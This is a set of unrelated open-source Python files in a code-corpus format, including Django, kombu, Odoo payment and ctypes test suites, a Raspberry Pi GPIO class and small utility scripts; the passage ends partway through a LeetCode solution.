    elif isinstance(value, int):
        dtype = 'int64'
    else:
        return None
    func_code = (
        "{} = paddle.fluid.layers.fill_constant(shape=[1], ".format(name) +
        "dtype='{}', value={})".format(dtype, value))
    return gast.parse(func_code).body[0]
def to_static_variable(x):
    '''
    Translate a Python Tensor to PaddlePaddle static graph Tensor
    '''
    # bool must be checked before the integer types: bool subclasses int.
    conversions = (
        (bool, 'bool'),
        (float, 'float64'),
        (six.integer_types, 'int64'),
    )
    for py_types, target_dtype in conversions:
        if isinstance(x, py_types):
            return fill_constant(shape=[1], dtype=target_dtype, value=x)
    # Anything else (e.g. already a Variable) passes through unchanged.
    return x
def create_bool_as_type(x, value=True):
    '''
    Create a bool variable, which type is the same as x.
    '''
    # Plain Python input -> plain Python bool; graph Variable input -> a
    # one-element bool tensor holding *value*.
    if not isinstance(x, Variable):
        return value
    return fill_constant(shape=[1], value=value, dtype="bool")
| apache-2.0 |
alexandrupirjol/django-filer | filer/tests/server_backends.py | 25 | 4610 | #-*- coding: utf-8 -*-
import time
import shutil
import os
from django.core.files.uploadedfile import SimpleUploadedFile
from django.http import HttpResponseNotModified, Http404
from django.test import TestCase
from django.utils.http import http_date
from filer import settings as filer_settings
from filer.models import File
from filer.server.backends.default import DefaultServer
from filer.server.backends.nginx import NginxXAccelRedirectServer
from filer.server.backends.xsendfile import ApacheXSendfileServer
from filer.tests.helpers import create_image
from filer.tests.utils import Mock
class BaseServerBackendTestCase(TestCase):
    """Shared fixture: a private filer ``File`` backed by a generated JPEG."""

    def setUp(self):
        source_name = 'testimage.jpg'
        upload = SimpleUploadedFile(
            name=source_name,
            content=create_image().tostring(),
            content_type='image/jpeg')
        self.filer_file = File.objects.create(
            is_public=False,
            file=upload,
            original_filename=source_name)

    def tearDown(self):
        self.filer_file.delete()
class DefaultServerTestCase(BaseServerBackendTestCase):
    """The default backend serves the file content through Django itself."""

    @staticmethod
    def _make_request(**meta):
        """Build a minimal mock request carrying the given META headers."""
        request = Mock()
        request.META = meta
        return request

    def test_normal(self):
        response = DefaultServer().serve(
            self._make_request(), self.filer_file.file)
        self.assertTrue(response.has_header('Last-Modified'))

    def test_not_modified(self):
        request = self._make_request(
            HTTP_IF_MODIFIED_SINCE=http_date(time.time()))
        response = DefaultServer().serve(request, self.filer_file.file)
        self.assertTrue(isinstance(response, HttpResponseNotModified))

    def test_missing_file(self):
        os.remove(self.filer_file.file.path)
        self.assertRaises(
            Http404, DefaultServer().serve,
            *(self._make_request(), self.filer_file.file))
class NginxServerTestCase(BaseServerBackendTestCase):
    """Tests for the nginx ``X-Accel-Redirect`` backend.

    This backend must delegate the actual transfer to nginx, so it should
    never open the file itself -- not even to notice that it is missing.
    """

    def setUp(self):
        super(NginxServerTestCase, self).setUp()
        self.server = NginxXAccelRedirectServer(
            location=filer_settings.FILER_PRIVATEMEDIA_STORAGE.location,
            nginx_location='mylocation',
        )

    def _assert_delegates_to_nginx(self, response):
        """Shared checks (previously duplicated in both tests): the redirect
        header is present, points into the configured nginx location, and the
        file object was never opened (otherwise the whole delegating to nginx
        would kinda be useless)."""
        headers = dict(response.items())
        self.assertTrue(response.has_header('X-Accel-Redirect'))
        self.assertTrue(
            headers['X-Accel-Redirect'].startswith(self.server.nginx_location))
        self.assertTrue(self.filer_file.file.closed)

    def test_normal(self):
        request = Mock()
        request.META = {}
        response = self.server.serve(request, self.filer_file.file)
        self._assert_delegates_to_nginx(response)

    def test_missing_file(self):
        """
        this backend should not even notice if the file is missing.
        """
        request = Mock()
        request.META = {}
        os.remove(self.filer_file.file.path)
        response = self.server.serve(request, self.filer_file.file)
        self._assert_delegates_to_nginx(response)
class XSendfileServerTestCase(BaseServerBackendTestCase):
    """Tests for the Apache ``X-Sendfile`` (mod_xsendfile) backend.

    Like the nginx backend, it must hand the transfer off to the web server
    and never open the file itself.  (The original inline comments said
    "nginx" here -- a copy/paste slip; this backend targets Apache.)
    """

    def setUp(self):
        super(XSendfileServerTestCase, self).setUp()
        self.server = ApacheXSendfileServer()

    def _assert_delegates_to_apache(self, response):
        """Shared checks (previously duplicated in both tests): the
        X-Sendfile header names the file's real path and the file object was
        never opened -- otherwise delegating to Apache would be useless."""
        headers = dict(response.items())
        self.assertTrue(response.has_header('X-Sendfile'))
        self.assertEqual(headers['X-Sendfile'], self.filer_file.file.path)
        self.assertTrue(self.filer_file.file.closed)

    def test_normal(self):
        request = Mock()
        request.META = {}
        response = self.server.serve(request, self.filer_file.file)
        self._assert_delegates_to_apache(response)

    def test_missing_file(self):
        """
        this backend should not even notice if the file is missing.
        """
        request = Mock()
        request.META = {}
        os.remove(self.filer_file.file.path)
        response = self.server.serve(request, self.filer_file.file)
        self._assert_delegates_to_apache(response)
campbe13/openhatch | vendor/packages/kombu/kombu/tests/transport/virtual/test_exchange.py | 24 | 4859 | from __future__ import absolute_import
from kombu import Connection
from kombu.transport.virtual import exchange
from kombu.tests.case import Case, Mock
from kombu.tests.mocks import Transport
class ExchangeCase(Case):
    """Base case: instantiates ``self.type`` on a virtual-transport channel."""
    type = None

    def setUp(self):
        exchange_cls = self.type
        if exchange_cls:
            channel = Connection(transport=Transport).channel()
            self.e = exchange_cls(channel)
class test_Direct(ExchangeCase):
    """Direct exchanges match the routing key exactly."""
    type = exchange.DirectExchange
    table = [('rFoo', None, 'qFoo'),
             ('rFoo', None, 'qFox'),
             ('rBar', None, 'qBar'),
             ('rBaz', None, 'qBaz')]

    def test_lookup(self):
        lookup = self.e.lookup
        # Two queues bound on the same key: both are returned.
        self.assertListEqual(lookup(self.table, 'eFoo', 'rFoo', None),
                             ['qFoo', 'qFox'])
        # Unknown key: empty result (the default argument is not a fallback
        # queue here).
        self.assertListEqual(lookup(self.table, 'eMoz', 'rMoz', 'DEFAULT'),
                             [])
        self.assertListEqual(lookup(self.table, 'eBar', 'rBar', None),
                             ['qBar'])
class test_Fanout(ExchangeCase):
    type = exchange.FanoutExchange
    # Fanout ignores the routing key entirely, hence the None key columns.
    table = [(None, None, 'qFoo'),
             (None, None, 'qFox'),
             (None, None, 'qBar')]

    def test_lookup(self):
        # Every bound queue is returned, whatever the routing key.
        self.assertListEqual(
            self.e.lookup(self.table, 'eFoo', 'rFoo', None),
            ['qFoo', 'qFox', 'qBar'],
        )

    def test_deliver_when_fanout_supported(self):
        # With native fanout support, delivery is delegated to the channel's
        # _put_fanout with the exchange name and routing key.
        self.e.channel = Mock()
        self.e.channel.supports_fanout = True
        message = Mock()
        self.e.deliver(message, 'exchange', 'rkey')
        self.e.channel._put_fanout.assert_called_with(
            'exchange', message, 'rkey',
        )

    def test_deliver_when_fanout_unsupported(self):
        # Without native support, deliver() must not call _put_fanout.
        self.e.channel = Mock()
        self.e.channel.supports_fanout = False
        self.e.deliver(Mock(), 'exchange', None)
        self.assertFalse(self.e.channel._put_fanout.called)
class test_Topic(ExchangeCase):
    type = exchange.TopicExchange
    table = [
        ('stock.#', None, 'rFoo'),
        ('stock.us.*', None, 'rBar'),
    ]

    def setUp(self):
        super(test_Topic, self).setUp()
        # Fill in the middle column: the regex pattern derived from each
        # AMQP-style routing key ('#' matches any tail, '*' one word --
        # see test_prepare_bind below).
        self.table = [(rkey, self.e.key_to_pattern(rkey), queue)
                      for rkey, _, queue in self.table]

    def test_prepare_bind(self):
        x = self.e.prepare_bind('qFoo', 'eFoo', 'stock.#', {})
        self.assertTupleEqual(x, ('stock.#', r'^stock\..*?$', 'qFoo'))

    def test_lookup(self):
        # Matches both 'stock.#' and 'stock.us.*'.
        self.assertListEqual(
            self.e.lookup(self.table, 'eFoo', 'stock.us.nasdaq', None),
            ['rFoo', 'rBar'],
        )
        # NOTE(review): _compiled is presumably the lazily-built compiled
        # pattern cache; confirm against TopicExchange.
        self.assertTrue(self.e._compiled)
        self.assertListEqual(
            self.e.lookup(self.table, 'eFoo', 'stock.europe.OSE', None),
            ['rFoo'],
        )
        # Dots are word separators, not wildcards: 'x' does not stand in.
        self.assertListEqual(
            self.e.lookup(self.table, 'eFoo', 'stockxeuropexOSE', None),
            [],
        )
        self.assertListEqual(
            self.e.lookup(self.table, 'eFoo',
                          'candy.schleckpulver.snap_crackle', None),
            [],
        )

    def test_deliver(self):
        # deliver() puts the message on every queue returned by _lookup,
        # in order.
        self.e.channel = Mock()
        self.e.channel._lookup.return_value = ('a', 'b')
        message = Mock()
        self.e.deliver(message, 'exchange', 'rkey')
        expected = [(('a', message), {}),
                    (('b', message), {})]
        self.assertListEqual(self.e.channel._put.call_args_list, expected)
class test_ExchangeType(ExchangeCase):
    """Behavior of the abstract ExchangeType base."""
    type = exchange.ExchangeType

    def test_lookup(self):
        # The base class leaves lookup() abstract.
        self.assertRaises(NotImplementedError,
                          self.e.lookup, [], 'eFoo', 'rFoo', None)

    def test_prepare_bind(self):
        prepared = self.e.prepare_bind('qFoo', 'eFoo', 'rFoo', {})
        self.assertTupleEqual(prepared, ('rFoo', None, 'qFoo'))

    def test_equivalent(self):
        e1 = dict(
            type='direct',
            durable=True,
            auto_delete=True,
            arguments={},
        )
        # Identical declaration -> equivalent.
        self.assertTrue(
            self.e.equivalent(e1, 'eFoo', 'direct', True, True, {}),
        )
        # Any single differing attribute breaks equivalence.
        for ex_type, durable, auto_delete, arguments in (
                ('topic', True, True, {}),
                ('direct', False, True, {}),
                ('direct', True, False, {}),
                ('direct', True, True, {'expires': 3000})):
            self.assertFalse(
                self.e.equivalent(e1, 'eFoo', ex_type, durable,
                                  auto_delete, arguments),
            )

        # Arguments must match exactly as well.
        e2 = dict(e1, arguments={'expires': 3000})
        self.assertTrue(
            self.e.equivalent(e2, 'eFoo', 'direct', True, True,
                              {'expires': 3000}),
        )
        self.assertFalse(
            self.e.equivalent(e2, 'eFoo', 'direct', True, True,
                              {'expires': 6000}),
        )
| agpl-3.0 |
Jucker/SIPIntercom-with-FPS | Output.py | 1 | 1795 | #!/usr/bin/env python
#-*- coding: utf-8 -*-
#################################################################
# classes Output #
# Création d'objet de type output pour les GPIO #
# #
# Auteur : Jucker Simon #
# Date : septembre 2015 #
#################################################################
import RPi.GPIO as g
import logging
#logger
logger = logging.getLogger("Output :")
#g.setwarning(False)
class Output:
    """A single GPIO output pin driven through RPi.GPIO (BCM numbering).

    ``name`` is only used to identify the pin in log messages.
    """

    # Select the Broadcom (BCM) pin numbering scheme at class-definition time.
    g.setmode(g.BCM)

    def __init__(self, channel, initial_state, name):
        """Configure ``channel`` as an output pin.

        :param channel: BCM channel number of the pin.
        :param initial_state: "low" or "high" — the initial output level.
        :param name: identifier used in log messages.
        :raises ValueError: if ``initial_state`` is neither "low" nor "high".
        """
        self.channel = channel
        self.initial_state = initial_state
        self.name = name
        # Re-assert BCM numbering in case another module changed the mode
        # between class definition and instantiation.
        g.setmode(g.BCM)
        if initial_state == "low":
            g.setup(self.channel, g.OUT, initial=g.LOW)
        elif initial_state == "high":
            g.setup(self.channel, g.OUT, initial=g.HIGH)
        else:
            # Previously an unknown value silently left the pin unconfigured;
            # fail fast instead so the misconfiguration is visible.
            raise ValueError(
                "initial_state must be 'low' or 'high', got %r"
                % (initial_state,))
        logger.debug(self.name + ": Output créé")

    def setHigh(self):
        """Drive the output to the high level."""
        g.output(self.channel, g.HIGH)
        logger.debug(self.name + ": High")

    def setLow(self):
        """Drive the output to the low level."""
        g.output(self.channel, g.LOW)
        logger.debug(self.name + ": Low")

    def getState(self):
        """Return the current output state: True = high, False = low."""
        # g.input() returns the pin level; normalise it to a real bool.
        return bool(g.input(self.channel))
brain-tec/l10n-switzerland | l10n_ch_pain_credit_transfer/tests/test_ch_sct.py | 1 | 15014 | # © 2016 Akretion (Alexis de Lattre <alexis.delattre@akretion.com>)
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo.addons.account.tests.account_test_classes\
import AccountingTestCase
from odoo.tools import float_compare
import time
from lxml import etree
import base64
ch_iban = 'CH15 3881 5158 3845 3843 7'
class TestSCTCH(AccountingTestCase):
    """Tests for Swiss credit-transfer (pain.001.001.03.ch.02) file
    generation from supplier invoices."""

    def setUp(self):
        """Build Swiss banks, company/partner bank accounts, a bank journal
        and a payment mode using the Swiss pain version."""
        super().setUp()
        Account = self.env['account.account']
        Journal = self.env['account.journal']
        PaymentMode = self.env['account.payment.mode']
        self.payment_order_model = self.env['account.payment.order']
        self.payment_line_model = self.env['account.payment.line']
        self.bank_line_model = self.env['bank.payment.line']
        self.partner_bank_model = self.env['res.partner.bank']
        self.attachment_model = self.env['ir.attachment']
        self.invoice_model = self.env['account.invoice']
        self.invoice_line_model = self.env['account.invoice.line']
        self.main_company = self.env.ref('base.main_company')
        self.partner_agrolait = self.env.ref('base.res_partner_2')
        self.account_expense = Account.search([(
            'user_type_id',
            '=',
            self.env.ref('account.data_account_type_expenses').id)], limit=1)
        self.account_payable = Account.search([(
            'user_type_id',
            '=',
            self.env.ref('account.data_account_type_payable').id)], limit=1)
        # Create a swiss bank
        ch_bank1 = self.env['res.bank'].create({
            'name': 'Alternative Bank Schweiz AG',
            'bic': 'ALSWCH21XXX',
            'clearing': '38815',
            'ccp': '46-110-7',
        })
        # create a ch bank account for my company
        self.cp_partner_bank = self.partner_bank_model.create({
            'acc_number': ch_iban,
            'partner_id': self.env.ref('base.main_partner').id,
        })
        self.cp_partner_bank.onchange_acc_number_set_swiss_bank()
        # create journal
        self.bank_journal = Journal.create({
            'name': 'Company Bank journal',
            'type': 'bank',
            'code': 'BNKFB',
            'bank_account_id': self.cp_partner_bank.id,
            'bank_id': ch_bank1.id,
        })
        # create a payment mode
        pay_method_id = self.env.ref(
            'account_banking_sepa_credit_transfer.sepa_credit_transfer').id
        self.payment_mode = PaymentMode.create({
            'name': 'CH credit transfer',
            'bank_account_link': 'fixed',
            'fixed_journal_id': self.bank_journal.id,
            'payment_method_id': pay_method_id,
        })
        self.payment_mode.payment_method_id.pain_version = \
            'pain.001.001.03.ch.02'
        self.chf_currency = self.env.ref('base.CHF')
        self.eur_currency = self.env.ref('base.EUR')
        self.main_company.currency_id = self.chf_currency.id
        ch_bank2 = self.env['res.bank'].create({
            'name': 'Banque Cantonale Vaudoise',
            'bic': 'BCVLCH2LXXX',
            'clearing': '767',
            'ccp': '01-1234-1',
        })
        it_bank = self.env['res.bank'].create({
            'name': 'Banca Popolare di Bergamo SpA',
            'bic': 'BEPOIT21XXX',
        })
        # Create a bank account with clearing 767
        self.agrolait_partner_bank = self.partner_bank_model.create({
            'acc_number': 'CH9100767000S00023455',
            'partner_id': self.partner_agrolait.id,
            'bank_id': ch_bank2.id,
            'ccp': '01-1234-1',
        })
        self.agrolait_partner_bank_sepa = self.partner_bank_model.create({
            'acc_number': 'IT60X0542811101000000123456',
            'partner_id': self.partner_agrolait.id,
            'bank_id': it_bank.id,
        })

    def test_sct_ch_payment_type1(self):
        """ISR invoices in CHF: the generated file must carry the CH01
        local instrument and no SEPA service level."""
        invoice1 = self.create_invoice(
            self.partner_agrolait.id,
            self.agrolait_partner_bank.id, self.chf_currency, 42.0,
            'isr', '132000000000000000000000014')
        invoice2 = self.create_invoice(
            self.partner_agrolait.id,
            self.agrolait_partner_bank.id, self.chf_currency, 12.0,
            'isr', '132000000000004')
        for inv in [invoice1, invoice2]:
            action = inv.create_account_payment_line()
        self.assertEquals(action['res_model'], 'account.payment.order')
        self.payment_order = self.payment_order_model.browse(action['res_id'])
        self.assertEquals(self.payment_order.payment_type, 'outbound')
        self.assertEquals(self.payment_order.payment_mode_id, self.payment_mode)
        self.assertEquals(self.payment_order.journal_id, self.bank_journal)
        pay_lines = self.payment_line_model.search([
            ('partner_id', '=', self.partner_agrolait.id),
            ('order_id', '=', self.payment_order.id)])
        self.assertEquals(len(pay_lines), 2)
        agrolait_pay_line1 = pay_lines[0]
        accpre = self.env['decimal.precision'].precision_get('Account')
        self.assertEquals(agrolait_pay_line1.currency_id, self.chf_currency)
        self.assertEquals(
            agrolait_pay_line1.partner_bank_id, invoice1.partner_bank_id)
        self.assertEquals(float_compare(
            agrolait_pay_line1.amount_currency, 42, precision_digits=accpre),
            0)
        self.assertEquals(agrolait_pay_line1.communication_type, 'isr')
        self.assertEquals(
            agrolait_pay_line1.communication,
            '132000000000000000000000014')
        self.payment_order.draft2open()
        self.assertEquals(self.payment_order.state, 'open')
        self.assertEquals(self.payment_order.sepa, False)
        bank_lines = self.bank_line_model.search([
            ('partner_id', '=', self.partner_agrolait.id)])
        # ISR payments cannot be grouped: one bank line per invoice.
        self.assertEquals(len(bank_lines), 2)
        for bank_line in bank_lines:
            self.assertEquals(bank_line.currency_id, self.chf_currency)
            self.assertEquals(bank_line.communication_type, 'isr')
            self.assertEquals(
                bank_line.communication in [
                    '132000000000000000000000014',
                    '132000000000004'], True)
            self.assertEquals(
                bank_line.partner_bank_id, invoice1.partner_bank_id)
        action = self.payment_order.open2generated()
        self.assertEquals(self.payment_order.state, 'generated')
        self.assertEquals(action['res_model'], 'ir.attachment')
        attachment = self.attachment_model.browse(action['res_id'])
        self.assertEquals(attachment.datas_fname[-4:], '.xml')
        xml_file = base64.b64decode(attachment.datas)
        xml_root = etree.fromstring(xml_file)
        # print "xml_file=", etree.tostring(xml_root, pretty_print=True)
        namespaces = xml_root.nsmap
        namespaces['p'] = xml_root.nsmap[None]
        namespaces.pop(None)
        pay_method_xpath = xml_root.xpath(
            '//p:PmtInf/p:PmtMtd', namespaces=namespaces)
        self.assertEquals(
            namespaces['p'],
            'http://www.six-interbank-clearing.com/de/'
            'pain.001.001.03.ch.02.xsd')
        self.assertEquals(pay_method_xpath[0].text, 'TRF')
        sepa_xpath = xml_root.xpath(
            '//p:PmtInf/p:PmtTpInf/p:SvcLvl/p:Cd', namespaces=namespaces)
        self.assertEquals(len(sepa_xpath), 0)
        local_instrument_xpath = xml_root.xpath(
            '//p:PmtInf/p:PmtTpInf/p:LclInstrm/p:Prtry', namespaces=namespaces)
        self.assertEquals(local_instrument_xpath[0].text, 'CH01')
        debtor_acc_xpath = xml_root.xpath(
            '//p:PmtInf/p:DbtrAcct/p:Id/p:IBAN', namespaces=namespaces)
        self.assertEquals(
            debtor_acc_xpath[0].text,
            self.payment_order.company_partner_bank_id.sanitized_acc_number)
        self.payment_order.generated2uploaded()
        self.assertEquals(self.payment_order.state, 'uploaded')
        for inv in [invoice1, invoice2]:
            self.assertEquals(inv.state, 'paid')
        return

    def test_sct_ch_payment_type3(self):
        """Plain-reference invoices in EUR to a CH account: payments are
        grouped on one bank line and carry no local instrument."""
        invoice1 = self.create_invoice(
            self.partner_agrolait.id,
            self.agrolait_partner_bank.id, self.eur_currency, 4042.0,
            'none', 'Inv1242')
        invoice2 = self.create_invoice(
            self.partner_agrolait.id,
            self.agrolait_partner_bank.id, self.eur_currency, 1012.55,
            'none', 'Inv1248')
        for inv in [invoice1, invoice2]:
            action = inv.create_account_payment_line()
        self.assertEquals(action['res_model'], 'account.payment.order')
        self.payment_order = self.payment_order_model.browse(action['res_id'])
        self.assertEquals(self.payment_order.payment_type, 'outbound')
        self.assertEquals(self.payment_order.payment_mode_id, self.payment_mode)
        self.assertEquals(self.payment_order.journal_id, self.bank_journal)
        pay_lines = self.payment_line_model.search([
            ('partner_id', '=', self.partner_agrolait.id),
            ('order_id', '=', self.payment_order.id)])
        self.assertEquals(len(pay_lines), 2)
        agrolait_pay_line1 = pay_lines[0]
        accpre = self.env['decimal.precision'].precision_get('Account')
        self.assertEquals(agrolait_pay_line1.currency_id, self.eur_currency)
        self.assertEquals(
            agrolait_pay_line1.partner_bank_id, invoice1.partner_bank_id)
        self.assertEquals(float_compare(
            agrolait_pay_line1.amount_currency, 4042.0,
            precision_digits=accpre), 0)
        self.assertEquals(agrolait_pay_line1.communication_type, 'normal')
        self.assertEquals(agrolait_pay_line1.communication, 'Inv1242')
        self.payment_order.draft2open()
        self.assertEquals(self.payment_order.state, 'open')
        self.assertEquals(self.payment_order.sepa, False)
        bank_lines = self.bank_line_model.search([
            ('partner_id', '=', self.partner_agrolait.id)])
        # Both invoices are merged into a single grouped bank line.
        self.assertEquals(len(bank_lines), 1)
        bank_line = bank_lines[0]
        self.assertEquals(bank_line.currency_id, self.eur_currency)
        self.assertEquals(bank_line.communication_type, 'normal')
        self.assertEquals(bank_line.communication, 'Inv1242-Inv1248')
        self.assertEquals(
            bank_line.partner_bank_id, invoice1.partner_bank_id)
        action = self.payment_order.open2generated()
        self.assertEquals(self.payment_order.state, 'generated')
        self.assertEquals(action['res_model'], 'ir.attachment')
        attachment = self.attachment_model.browse(action['res_id'])
        self.assertEquals(attachment.datas_fname[-4:], '.xml')
        xml_file = base64.b64decode(attachment.datas)
        xml_root = etree.fromstring(xml_file)
        # print "xml_file=", etree.tostring(xml_root, pretty_print=True)
        namespaces = xml_root.nsmap
        namespaces['p'] = xml_root.nsmap[None]
        namespaces.pop(None)
        pay_method_xpath = xml_root.xpath(
            '//p:PmtInf/p:PmtMtd', namespaces=namespaces)
        self.assertEquals(
            namespaces['p'],
            'http://www.six-interbank-clearing.com/de/'
            'pain.001.001.03.ch.02.xsd')
        self.assertEquals(pay_method_xpath[0].text, 'TRF')
        sepa_xpath = xml_root.xpath(
            '//p:PmtInf/p:PmtTpInf/p:SvcLvl/p:Cd', namespaces=namespaces)
        self.assertEquals(len(sepa_xpath), 0)
        local_instrument_xpath = xml_root.xpath(
            '//p:PmtInf/p:PmtTpInf/p:LclInstrm/p:Prtry', namespaces=namespaces)
        self.assertEquals(len(local_instrument_xpath), 0)
        debtor_acc_xpath = xml_root.xpath(
            '//p:PmtInf/p:DbtrAcct/p:Id/p:IBAN', namespaces=namespaces)
        self.assertEquals(
            debtor_acc_xpath[0].text,
            self.payment_order.company_partner_bank_id.sanitized_acc_number)
        self.payment_order.generated2uploaded()
        self.assertEquals(self.payment_order.state, 'uploaded')
        for inv in [invoice1, invoice2]:
            self.assertEquals(inv.state, 'paid')
        return

    def test_sct_ch_payment_type5(self):
        """EUR payments to a foreign (IT) IBAN: the file must use the SEPA
        service level and no local instrument."""
        invoice1 = self.create_invoice(
            self.partner_agrolait.id,
            self.agrolait_partner_bank_sepa.id, self.eur_currency, 1234.56,
            'none', 'Inv5555')
        invoice2 = self.create_invoice(
            self.partner_agrolait.id,
            self.agrolait_partner_bank_sepa.id, self.eur_currency, 9012.52,
            'none', 'Inv6666')
        for inv in [invoice1, invoice2]:
            action = inv.create_account_payment_line()
        self.payment_order = self.payment_order_model.browse(action['res_id'])
        self.payment_order.draft2open()
        action = self.payment_order.open2generated()
        self.assertEquals(self.payment_order.state, 'generated')
        attachment = self.attachment_model.browse(action['res_id'])
        xml_file = base64.b64decode(attachment.datas)
        xml_root = etree.fromstring(xml_file)
        namespaces = xml_root.nsmap
        namespaces['p'] = xml_root.nsmap[None]
        namespaces.pop(None)
        sepa_xpath = xml_root.xpath(
            '//p:PmtInf/p:PmtTpInf/p:SvcLvl/p:Cd', namespaces=namespaces)
        self.assertEquals(len(sepa_xpath), 1)
        local_instrument_xpath = xml_root.xpath(
            '//p:PmtInf/p:PmtTpInf/p:LclInstrm/p:Prtry', namespaces=namespaces)
        self.assertEquals(len(local_instrument_xpath), 0)
        debtor_acc_xpath = xml_root.xpath(
            '//p:PmtInf/p:DbtrAcct/p:Id/p:IBAN', namespaces=namespaces)
        self.assertEquals(
            debtor_acc_xpath[0].text,
            self.payment_order.company_partner_bank_id.sanitized_acc_number)
        self.payment_order.generated2uploaded()
        self.assertEquals(self.payment_order.state, 'uploaded')
        for inv in [invoice1, invoice2]:
            self.assertEquals(inv.state, 'paid')
        return

    def create_invoice(
            self, partner_id, partner_bank_id, currency, price_unit,
            ref_type, ref, inv_type='in_invoice'):
        """Create, validate and return a one-line supplier invoice using
        the test payment mode.

        :param ref_type: reference type, e.g. 'isr' or 'none'.
        :param ref: the invoice reference (ISR number or free text).
        """
        invoice = self.invoice_model.create({
            'partner_id': partner_id,
            'reference_type': ref_type,
            'reference': ref,
            'currency_id': currency.id,
            'name': 'test',
            'account_id': self.account_payable.id,
            'type': inv_type,
            'date_invoice': time.strftime('%Y-%m-%d'),
            'payment_mode_id': self.payment_mode.id,
            'partner_bank_id': partner_bank_id,
        })
        self.invoice_line_model.create({
            'invoice_id': invoice.id,
            'price_unit': price_unit,
            'quantity': 1,
            'name': 'Great service',
            'account_id': self.account_expense.id,
        })
        invoice.invoice_validate()
        invoice.action_move_create()
        return invoice
django-fluent/django-fluent-comments | example/article/tests/factories.py | 2 | 1430 | from random import random
from article.models import Article
from django.contrib.contenttypes.models import ContentType
from django.contrib.sites.models import Site
from django.utils.timezone import now
from django_comments import get_model as get_comment_model
def create_article(**kwargs):
    """
    Create an article, with default parameters

    Any keyword argument overrides the corresponding default field value.
    """
    defaults = dict(
        title="Testing article",
        # Random suffix keeps slugs unique across repeated factory calls.
        slug="testing-article" + str(random()),
        content="This is testing article",
        publication_date=now(),
        enable_comments=True,
    )
    defaults.update(kwargs)
    return Article.objects.create(**defaults)
def create_comment(comment_model=None, article=None, user=None, **kwargs):
    """
    Create a new comment.

    :param comment_model: comment model class; defaults to the configured
        django_comments model.
    :param article: article to attach the comment to; a fresh one is
        created when omitted.
    :param user: optional author; anonymous fields are filled regardless.
    Any keyword argument overrides the corresponding default field value.
    """
    if article is None:
        article = create_article()
    article_ctype = ContentType.objects.get_for_model(article)

    defaults = dict(
        user=user,
        user_name="Test-Name",
        user_email="test@example.com",
        user_url="http://example.com",
        comment="Test-Comment",
        submit_date=now(),
        site=Site.objects.get_current(),
        ip_address='127.0.0.1',
        is_public=True,
        is_removed=False,
    )
    defaults.update(kwargs)

    Comment = comment_model or get_comment_model()
    return Comment.objects.create(
        content_type=article_ctype,
        object_pk=article.pk,
        **defaults
    )
unitpoint/oxygine-objectscript | tools/others/generate_xml_lines.py | 1 | 1847 | import os
import shutil
import glob
def gen_xml(args):
    """Write an oxygine ``<resources>`` XML file listing images found in
    ``args.data/args.input``.

    Uses args attributes: data, input, wildcard, out, sfactor, load,
    atlasses.  When ``atlasses`` is true each image gets its own
    ``<atlas>`` element, otherwise a single atlas wraps them all.
    """
    path = args.data + "/" + args.input
    filelist = glob.glob(path + "/" + args.wildcard)

    # Use a context manager so the file is closed even on error
    # (the original handle leaked if a write raised).
    with open(args.data + "/" + args.out, "w") as dest:
        write = dest.write
        write("<resources>\n")
        write("\t<set path=\"%s\"/>\n" % (args.input, ))
        write("\t<set scale_factor=\"%s\"/>\n" % (args.sfactor, ))
        if not args.load:
            write("\t<set load=\"false\"/>\n")
        else:
            write("\t<set load=\"true\"/>\n")
        if not args.atlasses:
            write("\t<atlas>\n")
        for entry in filelist:  # renamed from 'file' (shadowed the builtin)
            name = os.path.split(entry)[1]
            if args.atlasses:
                write("\t<atlas>\n\t")
            write("\t<image file='%s' cols=\"1\"/>\n" % (name))
            if args.atlasses:
                write("\t</atlas>\n")
        if not args.atlasses:
            write("\t</atlas>\n")
        write("</resources>\n")
if __name__ == "__main__":
    import argparse

    parser = argparse.ArgumentParser(
        description="generates xml file with image resources")
    parser.add_argument("-d", "--data", help="data folder",
                        default=".", required=True)
    parser.add_argument("-s", "--sfactor", help="scale factor", default="1")
    parser.add_argument("-i", "--input", help="input folder with images",
                        default=".", required=True)
    parser.add_argument("-o", "--out", help="new output file",
                        default="out.xml")
    parser.add_argument("-w", "--wildcard", help="default is '*.png'",
                        default="*.png")
    parser.add_argument("-l", "--load", help="preload files?",
                        action="store_true")
    # BUG FIX: type=bool is broken in argparse — any non-empty string
    # (including "False") is truthy.  Use a store_true flag like --load.
    parser.add_argument("-a", "--atlasses",
                        help="separate atlasses for each file?",
                        action="store_true")
    args = parser.parse_args()
    gen_xml(args)
k3nnyfr/s2a_fr-nsis | s2a/Python/Lib/ctypes/test/test_simplesubclasses.py | 117 | 1355 | import unittest
from ctypes import *
class MyInt(c_int):
    """c_int subclass used to check that ctypes preserves subclass types.

    NOTE(review): __cmp__ and the ``cmp`` builtin only exist on Python 2;
    on Python 3 this method is never invoked.  Kept as-is because the
    surrounding test suite targets Python 2.
    """

    def __cmp__(self, other):
        if type(other) != MyInt:
            return -1
        return cmp(self.value, other.value)

    def __hash__(self):  # Silence Py3k warning
        return hash(self.value)
class Test(unittest.TestCase):
def test_compare(self):
self.assertEqual(MyInt(3), MyInt(3))
self.assertNotEqual(MyInt(42), MyInt(43))
def test_ignore_retval(self):
# Test if the return value of a callback is ignored
# if restype is None
proto = CFUNCTYPE(None)
def func():
return (1, "abc", None)
cb = proto(func)
self.assertEqual(None, cb())
def test_int_callback(self):
args = []
def func(arg):
args.append(arg)
return arg
cb = CFUNCTYPE(None, MyInt)(func)
self.assertEqual(None, cb(42))
self.assertEqual(type(args[-1]), MyInt)
cb = CFUNCTYPE(c_int, c_int)(func)
self.assertEqual(42, cb(42))
self.assertEqual(type(args[-1]), int)
def test_int_struct(self):
class X(Structure):
_fields_ = [("x", MyInt)]
self.assertEqual(X().x, MyInt())
s = X()
s.x = MyInt(42)
self.assertEqual(s.x, MyInt(42))
if __name__ == "__main__":
    unittest.main()
aenon/OnlineJudge | leetcode/5.BitManipulation/462.MinimumMovestoEqualArrayElementsII.py | 1 | 2223 | # 462. Minimum Moves to Equal Array Elements II
# Given a non-empty integer array, find the minimum number of moves required to make all array elements equal, where a move is incrementing a selected element by 1 or decrementing a selected element by 1.
# You may assume the array's length is at most 10,000.
# Example:
# Input:
# [1,2,3]
# Output:
# 2
# Explanation:
# Only two moves are needed (remember each move increments or decrements one element):
# [1,2,3] => [2,2,3] => [2,2,2]
class Solution(object):
    def minMoves2(self, nums):
        """
        :type nums: List[int]
        :rtype: int

        The answer is the sum of distances to a median, which minimises
        sum(|x - m|).  Sorting and taking the upper median keeps the whole
        computation in integer arithmetic; the previous version pulled in
